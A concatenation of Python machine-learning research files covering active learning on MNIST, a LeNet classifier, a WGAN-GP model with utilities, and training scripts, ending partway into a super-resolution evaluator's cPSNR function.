prob_arr = np.vstack(prob_list)
return prob_arr
def collate_fn(batch):
batch_dict = {}
for k in batch[0]:
batch_dict[k] = []
for i in range(len(batch)):
batch_dict[k] += [batch[i][k]]
# tuple(zip(*batch))
return batch_dict
def load_json(fname, decode=None):
with open(fname, "r") as json_file:
d = json.load(json_file)
return d
def save_json(fname, data):
with open(fname, "w") as json_file:
json.dump(data, json_file, indent=4, sort_keys=True)
#
# def load_latest(exp_dict, model, active_set, reset=False):
# exp_meta = em.get_exp_meta(exp_dict)
# history_path = exp_meta["savedir"] + "/history.pth"
# ckp_path = exp_meta["savedir"] + "/checkpoint.pth"
#
# if os.path.exists(ckp_path) and os.path.exists(history_path) and not reset:
# ckp = torch.load(ckp_path)
#
# model.load_state_dict(ckp['model_state_dict'])
# model.opt.load_state_dict(ckp['opt_state_dict'])
# history = mlkit_ut.load_pkl(history_path)
# score_dict = history["score_list"][-1]
# active_set._labelled = score_dict['labeled_data']
#
# else:
# print("Epoch 0: starting from scratch")
# history = {"score_list":[]}
#
# return model, history, active_set
#
# def save_latest(exp_dict, model, history):
# exp_meta = em.get_exp_meta(exp_dict)
# history_path = exp_meta["savedir"] + "/history.pth"
# ckp_path = exp_meta["savedir"] + "/checkpoint.pth"
#
# ckp = {"model_state_dict":model.state_dict(),
# "opt_state_dict":model.opt.state_dict()}
#
# torch.save(ckp, ckp_path)
# mlkit_ut.save_pkl(history_path, history)
def get_dataloader_dict(exp_dict, train_loader):
"""Get data loader dictionary."""
dataloader_dict = {}
if "n_total_iters" in exp_dict["option"]:
n_total_iters = int(exp_dict["option"]["n_total_iters"])
else:
n_total_iters = (len(train_loader.dataset) *
int(exp_dict["option"]["epochs"]))
n_total_iters = n_total_iters / int(exp_dict["option"]["batch_size"])
dataloader_dict["n_batches"] = len(train_loader)
dataloader_dict["n_total_iters"] = n_total_iters
return dataloader_dict
def load_ind_prev_images(savedir_base, exp_id):
path = savedir_base + "/%s/ind_prev/" % exp_id
fname_list = glob.glob(path + "*")
for fname in fname_list:
plt.figure()
plt.title("%s" % fname)
image = haven.imread(fname)
plt.imshow(image)
def load_selected_images(savedir_base, exp_id):
path = savedir_base + "/%s/selected/" % exp_id
fname_list = glob.glob(path + "*")
for fname in fname_list:
plt.figure()
plt.title("%s" % fname)
image = haven.imread(fname)
plt.imshow(image)
def load_selected_neg_images(savedir_base, exp_id):
path = savedir_base + "/%s/selected_neg/" % exp_id
fname_list = glob.glob(path + "*")
for fname in fname_list:
plt.figure()
plt.title("%s" % fname)
image = haven.imread(fname)
plt.imshow(image)
import copy
def get_prev_exp_dict(exp_dict):
exp_dict_prev = copy.deepcopy(exp_dict)
exp_dict_prev['savedir_base'] = exp_dict_prev['savedir_base'].replace("/non_borgy/","/borgy/")
exp_dict_prev["sampler_dict"]["stage"] = exp_dict["sampler_dict"]["stage"] - 1
return exp_dict_prev
def save_img_list(savedir_images, img_list):
os.makedirs(os.path.dirname(savedir_images),exist_ok=True)
for i, img in enumerate(img_list):
# plt.figure(figsize=(20,30))
plt.figure()
plt.imshow(img)
plt.xticks([])
plt.yticks([])
plt.tight_layout()
plt.savefig(savedir_images + "_%d.jpg" % i)
# plt.show()
plt.close()
class ExactSampler(sampler.Sampler):
def __init__(self, train_set, indices=np.arange(5)):
self.n_samples = len(train_set)
self.indices = indices
def __iter__(self):
indices = np.array(self.indices)
return iter(torch.from_numpy(indices).long())
def __len__(self):
return len(self.indices)
def time_to_montreal():
ts = time.time()
utc_dt = datetime.utcfromtimestamp(ts)
aware_utc_dt = utc_dt.replace(tzinfo=pytz.utc)
tz = pytz.timezone('America/Montreal')
dt = aware_utc_dt.astimezone(tz)
dt = datetime.fromtimestamp(ts, tz)
return dt.strftime("%I:%M %p (%b %d)")
```
#### File: active_learning/src/datasets.py
```python
import torchvision, torch
import numpy as np
from torchvision.transforms import transforms
from sklearn.utils import shuffle
from baal.utils.transforms import PILToLongTensor
from PIL import Image
import os
import os
import numpy as np
import random
import torch
from torch.utils.data import Dataset
from torchvision.transforms import functional as F
from PIL import Image
from PIL import Image
import numpy as np
import torch
import os
from skimage.io import imread
from scipy.io import loadmat
import torchvision.transforms.functional as FT
import numpy as np
import torch
from skimage.io import imread
import torchvision.transforms.functional as FT
from skimage.transform import rescale
import torchvision
from torchvision import datasets
from torchvision.transforms import transforms
import pylab as plt
from skimage.color import label2rgb
from torch import nn
def get_dataset(dataset_name, split, datadir_base='', exp_dict=None):
# load dataset
if dataset_name == "mnist_binary":
dataset = Mnist(split=split, binary=True, datadir_base=datadir_base)
if dataset_name == "mnist_full":
dataset = Mnist(split=split, binary=False, datadir_base=datadir_base)
return dataset
class Mnist:
def __init__(self, split, binary=False, datadir_base=None):
self.split = split
transform = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.5,), (0.5,))
])
if split == "train":
dataset = torchvision.datasets.MNIST(datadir_base, train=True,
download=True,
transform=transform)
elif split == "val":
dataset = torchvision.datasets.MNIST(datadir_base, train=False,
download=True,
transform=transform)
# get only two classes
if binary:
ind_class2 = dataset.targets == 2
ind_class8 = dataset.targets == 8
dc = torch.cat([dataset.data[ind_class2], dataset.data[ind_class8]])
tc = torch.cat([dataset.targets[ind_class2], dataset.targets[ind_class8]])
ind_shuffle = torch.randperm(dc.shape[0])
dataset.data = dc[ind_shuffle]
dataset.targets = tc[ind_shuffle]
self.dataset = dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, index):
images, labels = self.dataset[index]
batch = {"images": images,
"labels": labels,
"meta": {"index": index,
"image_id": index,
"split": self.split}}
return batch
```
#### File: active_learning/src/models.py
```python
import torch
from torch import nn
import tqdm
import torch.nn.functional as F
import torchvision
from torchvision import transforms
import os
import numpy as np
import time
from src import active_learning as al
from sklearn.metrics import confusion_matrix
import skimage
from haven import haven_utils as hu
from torchvision import transforms
from src import models
def get_model(model_name, exp_dict):
if model_name == "clf":
if exp_dict['model']['base'] == 'lenet':
base = LeNeT()
model = ClfModel(base)
return model
class ClfModel(torch.nn.Module):
def __init__(self, model_base):
super().__init__()
self.model_base = model_base
self.opt = torch.optim.SGD(self.parameters(), lr=1e-3)
def get_state_dict(self):
state_dict = {"model": self.model_base.state_dict(),
"opt":self.opt.state_dict()}
return state_dict
def set_state_dict(self, state_dict):
self.model_base.load_state_dict(state_dict["model"])
self.opt.load_state_dict(state_dict["opt"])
def train_on_loader(model, train_loader):
model.train()
n_batches = len(train_loader)
pbar = tqdm.tqdm(desc="Training", total=n_batches, leave=False)
train_monitor = TrainMonitor()
for e in range(1):
for i, batch in enumerate(train_loader):
score_dict = model.train_on_batch(batch)
train_monitor.add(score_dict)
if i % 10 == 0:
msg = "%d/%d %s" % (i, n_batches, train_monitor.get_avg_score())
pbar.update(10)
pbar.set_description(msg)
pbar.close()
return train_monitor.get_avg_score()
@torch.no_grad()
def val_on_loader(model, val_loader, val_monitor):
model.eval()
n_batches = len(val_loader)
pbar = tqdm.tqdm(desc="Validating", total=n_batches, leave=False)
for i, batch in enumerate(val_loader):
score = model.val_on_batch(batch)
val_monitor.add(score)
if i % 10 == 0:
msg = "%d/%d %s" % (i, n_batches, val_monitor.get_avg_score())
pbar.update(10)
# print(msg)
pbar.set_description(msg)
pbar.close()
return val_monitor.get_avg_score()
def train_on_batch(self, batch, **extras):
self.opt.zero_grad()
labels = batch["labels"].cuda()
logits = self.model_base.forward(batch["images"].cuda())
loss_clf = F.cross_entropy(logits.squeeze(),
labels.squeeze(), reduction="mean")
loss_clf.backward()
self.opt.step()
return {"train_loss":loss_clf.item()}
def val_on_batch(self, batch, **extras):
pred_clf = self.predict_on_batch(batch)
return (pred_clf.cpu().numpy().ravel() != batch["labels"].numpy().ravel())
def predict_on_batch(self, batch):
images = batch["images"].cuda()
n = images.shape[0]
logits = self.model_base.forward(images)
return logits.argmax(dim=1)
@torch.no_grad()
def score_on_batch(self, batch, active_learning_dict):
if active_learning_dict['name'] == 'entropy':
probs_mcmc = self.mcmc_on_batch(batch, active_learning_dict)
entropy = - al.xlogy(probs_mcmc).mean(dim=0).sum(dim=1)
scores = entropy
elif active_learning_dict['name'] == 'bald':
# mean over mcmc and sum over classes
probs_mcmc = self.mcmc_on_batch(batch, active_learning_dict)
entropy = al.xlogy(probs_mcmc).mean(dim=0).sum(dim=1)
entropy_avg = al.xlogy(probs_mcmc.mean(dim=0)).sum(dim=1)
scores = - (entropy + entropy_avg)
else:
raise
return scores
def get_active_indices(self, active_set, active_learning_dict, sampler=None):
if active_learning_dict["name"] == "random":
indices = np.random.choice(len(active_set.pool),
active_learning_dict['ndata_to_label'])
return indices
else:
pool_loader = torch.utils.data.DataLoader(active_set.pool,
batch_size=active_learning_dict["batch_size_pool"],
drop_last=False)
n_pool = len(active_set.pool)
score_list = torch.ones(n_pool) * -1
pbar = tqdm.tqdm(desc="Scoring pool", total=n_pool, leave=False)
s_ind = 0
for batch in pool_loader:
scores = self.score_on_batch(batch, active_learning_dict)
n_scores = batch['images'].shape[0]
score_list[s_ind:s_ind+n_scores] = scores.cpu()
s_ind += n_scores
pbar.set_description("Scoring pool")
pbar.update(scores.shape[0])
pbar.close()
assert -1 not in score_list
# higher is better
scores, ranks = score_list.sort()
indices = ranks[-active_learning_dict['ndata_to_label']:]
return indices
def mcmc_on_batch(self, batch, active_learning_dict):
self.eval()
al.set_dropout_train(self)
# put images to cuda
images = batch["images"]
images = images.cuda()
# variables
n_mcmc = active_learning_dict["n_mcmc"]
input_shape = images.size()
batch_size = input_shape[0]
# multiply images with n_mcmc
images_stacked = torch.stack([images] * n_mcmc)
images_stacked = images_stacked.view(batch_size * n_mcmc,
*input_shape[1:])
# compute the logits
logits = self.model_base(images_stacked)
logits = logits.view([n_mcmc, batch_size, *logits.size()[1:]])
probs = F.softmax(logits, dim=2)
return probs
class ClfMonitor:
def __init__(self):
self.wrongs = 0
self.n_samples = 0
def add(self, wrongs):
self.wrongs += wrongs.sum()
self.n_samples += wrongs.shape[0]
def get_avg_score(self):
return {"val_error": (self.wrongs/ self.n_samples)}
# Architectures
# =============
class LeNeT(nn.Module):
def __init__(self):
super().__init__()
nb_filters = 32
nb_conv = 4
self.nb_pool = 2
self.conv1 = nn.Conv2d(1, nb_filters, (nb_conv,nb_conv), padding=0)
self.conv2 = nn.Conv2d(nb_filters, nb_filters, (nb_conv, nb_conv), padding=0)
# self.conv3 = nn.Conv2d(nb_filters, nb_filters*2, (nb_conv, nb_conv), 1)
# self.conv4 = nn.Conv2d(nb_filters*2, nb_filters*2, (nb_conv, nb_conv), 1)
self.dropout1 = nn.Dropout2d(p=0.25)
self.dropout2 = nn.Dropout(p=0.5)
self.fc1 = nn.Linear(3872, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x_input):
n,c,h,w = x_input.shape
x = self.conv1(x_input)
x = nn.functional.relu(x)
x = self.conv2(x)
x = nn.functional.relu(x)
x = nn.functional.max_pool2d(x, self.nb_pool, self.nb_pool)
x = self.dropout1(x)
x = x.view(n, -1)
x = self.fc1(x)
x = nn.functional.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
return x
```
#### File: src/models/wgan.py
```python
import torch
import torchvision.utils as vutils
import torch.autograd as autograd
import os
import src.utils as ut
from src import models
import tqdm
class WGan(torch.nn.Module):
def __init__(self, netG, netD, optG, optD, device,
image_size, batch_size, lambda_gp, d_iterations):
super().__init__()
self.device = device
self.netG = netG
self.optG = optG
self.netD = netD
self.optD = optD
self.batch_size = batch_size
self.image_size = image_size
self.fixed_noise = torch.randn(self.batch_size, self.netG.nz, 1, 1,
device=self.device)
self.iteration = 0
self.lambda_gp = lambda_gp
self.d_iterations = d_iterations
self.errG = torch.Tensor([0]).to(self.device)
def get_state_dict(self):
state_dict = {'optG': self.optG.state_dict(),
'netG': self.netG.state_dict(),
'optD': self.optD.state_dict(),
'netD': self.netD.state_dict()}
return state_dict
def load_state_dict(self, state_dict):
self.optG.load_state_dict(state_dict['optG'])
self.netG.load_state_dict(state_dict['netG'])
self.optD.load_state_dict(state_dict['optD'])
self.netD.load_state_dict(state_dict['netD'])
def train_on_batch(self, batch):
self.iteration += 1
############################
# (1) Train Discriminator
###########################
self.optD.zero_grad()
real_images = batch[0].to(self.device)
batch_size = real_images.size(0)
real_output = self.netD(real_images)
noise = torch.randn(batch_size, self.netG.nz, 1, 1, device=self.device)
fake_images = self.netG(noise)
fake_output = self.netD(fake_images)
# Gradient penalty
gp = self._compute_gradient_penalty(real_images.detach(),
fake_images.detach())
# Adversarial loss
errD = self._compute_d_loss(real_output, fake_output, gp,
self.lambda_gp)
# TODO: clean this up so you don't compute it twice
emd = torch.mean(real_output) - torch.mean(fake_output)
errD.backward()
self.optD.step()
############################
# (2) Train Generator every d_iterations
###########################
self.optG.zero_grad()
if self.iteration % self.d_iterations == 0:
# Generate a batch of images
fake_images = self.netG(noise)
# Loss measures generator's ability to fool the discriminator
# Train on fake images
fake_output = self.netD(fake_images)
self.errG = self._compute_g_loss(fake_output)
self.errG.backward()
self.optG.step()
return {
'losses': {
'loss_D': errD.item(),
'loss_G': self.errG.item(),
'wasserstein_loss_emd': emd.item()
}
}
@torch.no_grad()
def eval_on_batch(self, batch, savedir, epoch, summary_writer):
self.eval()
images_path = os.path.join(savedir, 'images')
os.makedirs(images_path, exist_ok=True)
fake = self.netG(self.fixed_noise)
fake_save_path = os.path.join(images_path,
'fake_samples_epoch_%04d.png' %
epoch)
vutils.save_image(fake.detach(), fake_save_path,
normalize=True)
def _compute_d_loss(self, real_output, fake_output, gp, lambda_gp):
return -torch.mean(real_output) + torch.mean(fake_output) + \
lambda_gp * gp
def _compute_g_loss(self, fake_output):
return -torch.mean(fake_output)
def _compute_gradient_penalty(self, real_images, fake_images):
"""Calculates the gradient penalty loss for WGAN GP"""
batch_size = real_images.size(0)
# Random weight term for interpolation between real and fake samples
alpha = torch.rand(batch_size, 1, 1, 1).to(self.device)
# Get random interpolation between real and fake samples
interpolates = (alpha * real_images + ((1 - alpha) * fake_images))\
.requires_grad_(True)
d_interpolates = self.netD(interpolates)
fake = torch.ones(batch_size).to(self.device).requires_grad_(False)
# Get gradient w.r.t. interpolates
gradients = autograd.grad(
outputs=d_interpolates,
inputs=interpolates,
grad_outputs=fake,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()
return gradient_penalty
def train_on_loader(self, train_loader):
self.train()
n_batches = len(train_loader)
pbar = tqdm.tqdm(total=n_batches, miniters=max(n_batches/100, 1), ncols=180)
agg_results = {}
for i, batch in enumerate(train_loader):
results = self.train_on_batch(batch)
for loss_name, loss_value in results['losses'].items():
if loss_name in agg_results:
agg_results[loss_name] += loss_value
else:
agg_results[loss_name] = loss_value
# mesg = 'Epoch {}/{}:\t'.format(epoch, num_epochs)
mesg = ''
for name, loss in results['losses'].items():
mesg += '{}: {:.6f} '.format(name, loss)
if 'others' in results:
for name, info in results['others'].items():
mesg += '{}: {:.6f} '.format(name, info)
pbar.update(1)
pbar.set_description(mesg, refresh=False)
pbar.close()
avg_results = {}
for agg_loss_name, agg_loss_value in agg_results.items():
avg_results[agg_loss_name] = agg_loss_value / n_batches
return avg_results
def val_on_loader(self, test_loader, savedir, epoch):
batch = iter(test_loader).next()
self.val_on_batch(batch, savedir, epoch)
```
#### File: gans/src/utils.py
```python
import torch
import torchvision
import os
import re
import time
import zipfile
import shutil
import tqdm
import random
from torch.utils.data import sampler
from PIL import Image
from itertools import cycle, islice
# ========================================================
# Dataset-related functions and classes
# ========================================================
def subset_dataset(dataset, size):
data = [dataset[i] for i in range(size)]
class SubsetDataset(torch.nn.Module):
def __init__(self, data, dataset):
self.data = data
self.split = dataset.split
def __getitem__(self, item):
return self.data[item]
def __len__(self):
return len(self.data)
dataset = SubsetDataset(data, dataset)
return dataset
def get_indices(dataset, class_indices):
indices = []
for i in range(len(dataset.targets)):
if dataset.targets[i] in class_indices:
indices.append(i)
return indices
def get_indices_unique(dataset, class_indices):
indices = []
obtained_class_indices = []
for i in range(len(dataset.targets)):
if dataset.targets[i] in class_indices\
and dataset.targets[i] not in obtained_class_indices:
indices.append(i)
obtained_class_indices.append(dataset.targets[i])
return indices
class ConditionalDataset(torch.utils.data.Dataset):
def __init__(self, dataset, shuffle_cond=True):
self.dataset = dataset
self.targets = self.dataset.targets
classes_to_indices = list(range(len(self.dataset.classes)))
self.dataset_class_split = {
classes_to_indices[i]: get_indices(self.dataset,
[classes_to_indices[i]])
for i in classes_to_indices
}
self.shuffle_cond = shuffle_cond
def __getitem__(self, index):
img, target = self.dataset[index]
if self.shuffle_cond:
cond_index = random.choice(self.dataset_class_split[target])
else:
cond_index = index
cond_image, cond_target = self.dataset[cond_index]
return img, target, cond_image, cond_target
def __len__(self):
return len(self.dataset)
# ========================================================
# Image utility functions
# ========================================================
def reformat_image(filename, data):
pass
def reformat_images(images):
pass
def stack_img_list(img_list):
image_list_torch = []
for i in img_list:
if i.ndim == 4:
i = i[0]
if i.max() > 1:
i = i / 255.
image_list_torch += [i]
image_list_torch = torch.stack(image_list_torch)
img = torchvision.utils.make_grid(image_list_torch, nrow=5)
return img
def load_image(filename, size=None, scale=None):
img = Image.open(filename)
if size is not None:
img = img.resize((size, size), Image.ANTIALIAS)
elif scale is not None:
img = img.resize((int(img.size[0] / scale), int(img.size[1] / scale)), Image.ANTIALIAS)
return img
def save_image(filename, data):
img = data.detach().clone().clamp(0, 255).numpy()
img = img.transpose(1, 2, 0).astype('uint8')
img = Image.fromarray(img)
img.save(filename)
def save_images(save_dir, images, epoch=None, batch_id=None, filenames=None):
i = 0
for image in images:
filename = str(i).zfill(8) + '.png'
if epoch is not None and batch_id is not None and filenames is None:
epoch_str = str(epoch).zfill(8)
batch_id_str = str(batch_id).zfill(8)
filename = epoch_str + '_' + batch_id_str + '_' + filename
if filenames is not None:
filename = filenames[i]
save_path = os.path.join(save_dir, filename)
save_image(save_path, image)
i += 1
def gram_matrix(y):
(b, ch, h, w) = y.size()
features = y.view(b, ch, w * h)
features_t = features.transpose(1, 2)
gram = features.bmm(features_t) / (ch * h * w)
return gram
def normalize_batch(batch):
# normalize using imagenet mean and std
mean = batch.new_tensor([0.485, 0.456, 0.406]).view(-1, 1, 1)
std = batch.new_tensor([0.229, 0.224, 0.225]).view(-1, 1, 1)
batch = batch.div(255.0)
return (batch - mean) / std
def unnormalize_batch(batch):
# unnormalize using imagenet mean and std
mean = batch.new_tensor([0.485, 0.456, 0.406]).view(-1, 1, 1)
std = batch.new_tensor([0.229, 0.224, 0.225]).view(-1, 1, 1)
return ((batch * std) + mean) * 255.0
# ========================================================
# Misc.
# ========================================================
def unzip(source_filename, dest_dir):
with zipfile.ZipFile(source_filename) as zf:
zf.extractall(path=dest_dir)
def load_state_dict(fname_model, style_model):
state_dict = torch.load(fname_model)
for k in list(state_dict.keys()):
if re.search(r'in\d+\.running_(mean|var)$', k):
del state_dict[k]
style_model.load_state_dict(state_dict)
style_model.cuda()
return style_model
def rmtree(dir):
shutil.rmtree(dir, ignore_errors=True)
'''
MIT license: http://opensource.org/licenses/MIT
Copyright (c) <2013> <<NAME>>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
def flatten_list(alist):
'''
No Python hacks in this implementation. Also, this accepts many levels of nested lists.
The limit is in the number of recursive calls.
@alist: A tuple or list.
@return: A flat list with all elements of @alist and its nested lists.
Complexity: `Θ(n)`, where `n` is the number of elements of @alist
plus the number of elements of all nested lists.
'''
new_list = []
for item in alist:
if isinstance(item, (list, tuple)):
new_list.extend(flatten_list(item))
else:
new_list.append(item)
return new_list
def add_hparams(self, hparam_dict, metric_dict, global_step=None):
from torch.utils.tensorboard.summary import hparams
"""Add a set of hyperparameters to be compared in TensorBoard.
Args:
hparam_dict (dictionary): Each key-value pair in the dictionary is the
name of the hyper parameter and it's corresponding value.
metric_dict (dictionary): Each key-value pair in the dictionary is the
name of the metric and it's corresponding value. Note that the key used
here should be unique in the tensorboard record. Otherwise the value
you added by `add_scalar` will be displayed in hparam plugin. In most
cases, this is unwanted.
p.s. The value in the dictionary can be `int`, `float`, `bool`, `str`, or
0-dim tensor
Examples::
from torch.utils.tensorboard import SummaryWriter
with SummaryWriter() as w:
for i in range(5):
w.add_hparams({'lr': 0.1*i, 'bsize': i},
{'hparam/accuracy': 10*i, 'hparam/loss': 10*i})
Expected result:
.. image:: _static/img/tensorboard/add_hparam.png
:scale: 50 %
"""
if type(hparam_dict) is not dict or type(metric_dict) is not dict:
raise TypeError('hparam_dict and metric_dict should be dictionary.')
exp, ssi, sei = hparams(hparam_dict, metric_dict)
self.file_writer.add_summary(exp, global_step)
self.file_writer.add_summary(ssi, global_step)
self.file_writer.add_summary(sei, global_step)
for k, v in metric_dict.items():
self.add_scalar(k, v, global_step)
def roundrobin(*iterables):
"roundrobin('ABC', 'D', 'EF') --> A D E B F C"
# Recipe credited to <NAME>
num_active = len(iterables)
nexts = cycle(iter(it).__next__ for it in iterables)
while num_active:
try:
for next in nexts:
yield next()
except StopIteration:
# Remove the iterator we just exhausted from the cycle.
num_active -= 1
nexts = cycle(islice(nexts, num_active))
```
#### File: examples/gans/trainval.py
```python
import torch
# Standard Python libraries
import os
import argparse
# Others
import exp_configs
import src.datasets as datasets
import src.utils as ut
from src import models
from src import dataloaders
import pandas as pd
# External libraries
import pprint
# Haven
from haven import haven_utils as hu
from haven import haven_results as hr
from haven import haven_chk as hc
from haven import haven_img as hi
def train(exp_dict, savedir_base, reset, compute_fid=False):
# Book keeping
pprint.pprint(exp_dict)
exp_id = hu.hash_dict(exp_dict)
savedir = os.path.join(savedir_base, exp_id)
if reset:
ut.rmtree(savedir)
os.makedirs(savedir, exist_ok=True)
hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
print('Experiment saved in %s' % savedir)
device = \
torch.device('cuda:' + exp_dict['gpu'] if torch.cuda.is_available() else 'cpu')
# 1. Load dataset and loader
train_set, test_set, num_channels, num_train_classes, num_test_classes = \
datasets.get_dataset(exp_dict['dataset'],
dataset_path=savedir_base,
image_size=exp_dict['image_size'])
train_loader, test_loader = \
dataloaders.get_dataloader(exp_dict['dataloader'],
train_set, test_set, exp_dict)
# 2. Fetch model to train
model = models.get_model(exp_dict['model'],
num_train_classes, num_test_classes,
num_channels, device, exp_dict)
# 3. Resume experiment or start from scratch
score_list_path = os.path.join(savedir, 'score_list.pkl')
if os.path.exists(score_list_path):
# Resume experiment if it exists
model_path = os.path.join(savedir, 'model_state_dict.pth')
model.load_state_dict(hu.torch_load(model_path))
score_list = hu.load_pkl(score_list_path)
meta_dict_path = os.path.join(savedir, 'meta_dict.pkl')
meta_dict = hu.load_pkl(meta_dict_path)
print('Resuming experiment at episode %d epoch %d' %
(meta_dict['episode'], meta_dict['epoch']))
else:
# Start experiment from scratch
meta_dict = {'episode': 1, 'epoch': 1}
score_list = []
# Remove TensorBoard logs from previous runs
ut.rmtree(os.path.join(savedir, 'tensorboard_logs'))
print('Starting experiment at episode %d epoch %d' %
(meta_dict['episode'], meta_dict['epoch']))
# 4. Train and eval loop
s_epoch = meta_dict['epoch']
for e in range(s_epoch, exp_dict['num_epochs'] + 1):
# 0. Initialize dicts
score_dict = {'epoch': e}
meta_dict['epoch'] = e
# 1. Train on loader
train_dict = model.train_on_loader(train_loader)
# 1b. Compute FID
if compute_fid == 1:
if e % 20 == 0 or e == 1 or e == exp_dict['num_epochs']:
print('Starting FID computation...')
train_dict['fid'] = fid(model, train_loader.dataset,
train_loader.sampler, save_dir)
score_dict.update(train_dict)
# 2. Eval on loader
eval_dict = model.val_on_loader(test_loader, savedir, e)
score_dict.update(eval_dict)
# 3. Report and save model state, optimizer state, and scores
score_list += [score_dict]
score_df = pd.DataFrame(score_list)
print('\n', score_df.tail(), '\n')
if e % 10 == 0:
hu.torch_save(os.path.join(savedir, 'model_state_dict.pth'),
model.get_state_dict())
hu.save_pkl(os.path.join(savedir, 'score_list.pkl'), score_list)
hu.save_pkl(os.path.join(savedir, 'meta_dict.pkl'), meta_dict)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--exp_group_list', nargs='+')
parser.add_argument('-sb', '--savedir_base', required=True)
parser.add_argument('-r', '--reset', default=0, type=int)
parser.add_argument('-ei', '--exp_id', default=None)
args = parser.parse_args()
# Collect experiments
if args.exp_id is not None:
# Select one experiment
savedir = os.path.join(args.savedir_base, args.exp_id)
exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))
exp_list = [exp_dict]
else:
# Select exp group
exp_list = []
for exp_group_name in args.exp_group_list:
exp_list += exp_configs.EXP_GROUPS[exp_group_name]
# Launch jobs on compute cluster
if False:
from haven import haven_jobs as hj
run_command = ('python train.py -ei <exp_id> '
'-fid %d -sb %s -u %s -t %s' %
(args.compute_fid, args.savedir_base, args.username,
args.use_tensorboard))
hj.run_exp_list_jobs(
exp_list,
savedir_base=args.savedir_base,
workdir=os.path.dirname(os.path.realpath(__file__)),
run_command=run_command,
job_utils_path=exp_configs.JOB_UTILS_PATH,
job_config=exp_configs.BORGY_CONFIGS[args.username])
# Launch jobs locally
else:
# Run experiments
for exp_dict in exp_list:
train(exp_dict=exp_dict,
savedir_base=args.savedir_base,
reset=args.reset)
```
#### File: examples/minimal/trainval.py
```python
import os
import argparse
import pandas as pd
import pprint
import torch
import exp_configs
import models
import datasets
from haven import haven_utils as hu
from haven import haven_chk as hc
from haven import haven_jobs as hj
def trainval(exp_dict, savedir_base, reset=False):
# bookkeeping
# ---------------
# get experiment directory
exp_id = hu.hash_dict(exp_dict)
savedir = os.path.join(savedir_base, exp_id)
if reset:
# delete and backup experiment
hc.delete_experiment(savedir, backup_flag=True)
# create folder and save the experiment dictionary
os.makedirs(savedir, exist_ok=True)
hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
pprint.pprint(exp_dict)
print('Experiment saved in %s' % savedir)
# Dataset
# -----------
# train loader
train_loader = datasets.get_loader(dataset_name=exp_dict['dataset'], datadir=savedir_base,
split='train')
# val loader
val_loader = datasets.get_loader(dataset_name=exp_dict['dataset'], datadir=savedir_base,
split='val')
# Model
# -----------
model = models.get_model(model_name=exp_dict['model'])
# Checkpoint
# -----------
model_path = os.path.join(savedir, 'model.pth')
score_list_path = os.path.join(savedir, 'score_list.pkl')
if os.path.exists(score_list_path):
# resume experiment
model.set_state_dict(hu.torch_load(model_path))
score_list = hu.load_pkl(score_list_path)
s_epoch = score_list[-1]['epoch'] + 1
else:
# restart experiment
score_list = []
s_epoch = 0
# Train & Val
# ------------
print('Starting experiment at epoch %d' % (s_epoch))
for e in range(s_epoch, 10):
score_dict = {}
# Train the model
train_dict = model.train_on_loader(train_loader)
# Validate the model
val_dict = model.val_on_loader(val_loader)
# Get metrics
score_dict['train_loss'] = train_dict['train_loss']
score_dict['val_acc'] = val_dict['val_acc']
score_dict['epoch'] = e
# Add to score_list and save checkpoint
score_list += [score_dict]
# Report & Save
score_df = pd.DataFrame(score_list)
print(score_df.tail())
hu.torch_save(model_path, model.get_state_dict())
hu.save_pkl(score_list_path, score_list)
print('Checkpoint Saved: %s' % savedir)
print('experiment completed')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--exp_group_list', nargs='+')
parser.add_argument('-sb', '--savedir_base', required=True)
parser.add_argument('-r', '--reset', default=0, type=int)
parser.add_argument('-ei', '--exp_id', default=None)
parser.add_argument('-v', '--view_jupyter', default=None)
parser.add_argument('-j', '--run_jobs', default=None)
args = parser.parse_args()
# Collect experiments
# -------------------
if args.exp_id is not None:
# select one experiment
savedir = os.path.join(args.savedir_base, args.exp_id)
exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))
exp_list = [exp_dict]
else:
# select exp group
exp_list = []
for exp_group_name in args.exp_group_list:
exp_list += exp_configs.EXP_GROUPS[exp_group_name]
# Run experiments or View them
# ----------------------------
if args.run_jobs:
# launch jobs
from haven import haven_jobs as hj
hj.run_exp_list_jobs(exp_list,
savedir_base=args.savedir_base,
workdir=os.path.dirname(os.path.realpath(__file__)))
else:
# run experiments
for exp_dict in exp_list:
# do trainval
trainval(exp_dict=exp_dict,
savedir_base=args.savedir_base,
reset=args.reset)
``` |
{
"source": "jqueguiner/HighRes-net",
"score": 3
} |
#### File: HighRes-net/src/Evaluator.py
```python
import itertools
import numpy as np
from tqdm import tqdm
from DataLoader import get_patch
def cPSNR(sr, hr, hr_map):
"""
Clear Peak Signal-to-Noise Ratio. The PSNR score, adjusted for brightness and other volatile features, e.g. clouds.
Args:
sr: numpy.ndarray (n, m), super-resolved image
hr: numpy.ndarray (n, m), high-res ground-truth image
hr_map: numpy.ndarray (n, m), status map of high-res image, indicating clear pixels by a value of 1
Returns:
cPSNR: float, score
